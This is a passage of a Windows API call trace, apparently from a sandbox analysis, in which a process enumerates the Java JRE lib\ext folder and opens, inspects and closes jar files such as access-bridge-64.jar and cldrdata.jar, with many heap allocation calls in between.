Flags=0x0, Size=0x76) returned 0x6a430 [0095.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0095.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0095.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0095.304] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf58, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="flavormap.properties", cAlternateFileName="FLAVOR~1.PRO")) returned 1 [0095.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0095.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0095.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0095.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0095.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0095.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0095.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0095.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0095.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0095.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0095.305] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78290 [0095.399] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa11bdb26, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa8ed01b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0095.399] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2de78, dwReserved0=0x0, dwReserved1=0x0, cFileName="access-bridge-64.jar", cAlternateFileName="ACCESS~1.JAR")) returned 1 [0095.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0095.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0095.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0095.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0095.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0095.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0095.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0095.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0095.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0095.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0095.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0095.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0095.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0095.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0095.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0095.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0095.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0095.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0095.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0095.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0095.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ac50 [0095.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0095.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0095.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0095.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0095.401] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.401] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.401] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.401] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0095.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0095.401] AreFileApisANSI () returned 1 [0095.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar", lpUsedDefaultChar=0x0) returned 64 [0095.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0095.401] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.401] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0095.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0095.401] AreFileApisANSI () returned 1 [0095.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0095.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0095.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6e828, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 64 [0095.402] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.403] GetFileType (hFile=0x368) returned 0x1 [0095.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0095.403] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.403] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.403] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.403] CloseHandle (hObject=0x368) returned 1 [0095.403] AreFileApisANSI () returned 1 [0095.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0095.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0095.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6e1c8, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 64 [0095.404] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.404] GetFileType (hFile=0x368) returned 0x1 [0095.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0095.404] CloseHandle (hObject=0x368) returned 1 [0095.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0095.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0095.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0095.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0095.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0095.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0095.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0095.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0095.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0095.405] AreFileApisANSI () returned 1 [0095.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0095.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0095.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar") returned 64 [0095.405] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2de78)) returned 1 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0095.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.405] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8bb82c9, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3ae816, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="cldrdata.jar", cAlternateFileName="")) returned 1 [0095.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0095.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0095.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0095.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0095.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0095.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0095.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0095.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0095.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a238 [0095.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0095.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0095.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0095.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0095.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.406] AreFileApisANSI () returned 1 [0095.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar", lpUsedDefaultChar=0x0) returned 56 [0095.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0095.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0095.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0095.406] AreFileApisANSI () returned 1 [0095.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0095.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0095.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 56 [0095.407] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.407] GetFileType (hFile=0x368) returned 0x1 [0095.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0095.407] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.407] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.407] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.407] CloseHandle (hObject=0x368) returned 1 [0095.408] AreFileApisANSI () returned 1 [0095.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0095.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0095.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 56 [0095.408] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.408] GetFileType (hFile=0x368) returned 0x1 [0095.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0095.408] CloseHandle (hObject=0x368) returned 1 [0095.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0095.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0095.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 